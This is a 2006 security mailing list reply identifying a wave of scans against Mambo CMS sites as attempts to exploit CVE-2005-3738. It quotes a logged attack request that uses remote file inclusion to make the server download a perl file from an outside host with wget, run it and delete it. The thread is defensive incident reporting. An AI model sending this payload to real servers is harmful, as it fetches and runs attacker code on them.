Security Incidents mailing list archives
Re: High volume of Mambo scans
From: "George A. Theall" <theall () tifaware com>
Date: Sun, 14 May 2006 20:24:58 -0400
On Sat, May 13, 2006 at 10:36:41AM -0300, Daniel Cid wrote:
Since Thursday night I'm seeing a high volume of scans
...
200.80.39.39 - - [12/May/2006:15:27:28 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
This looks like what's covered by CVE-2005-3738 and described here: http://archives.neohapsis.com/archives/fulldisclosure/2005-11/0520.html George -- theall () tifaware com
Attachment:
_bin
Description:
Current thread:
- High volume of Mambo scans Daniel Cid (May 14)
- Re: High volume of Mambo scans Peter Kosinar (May 14)
- Re: High volume of Mambo scans George A. Theall (May 14)
- Re: High volume of Mambo scans Jamie Riden (May 14)
- Re: High volume of Mambo scans Karl Schlitt (May 15)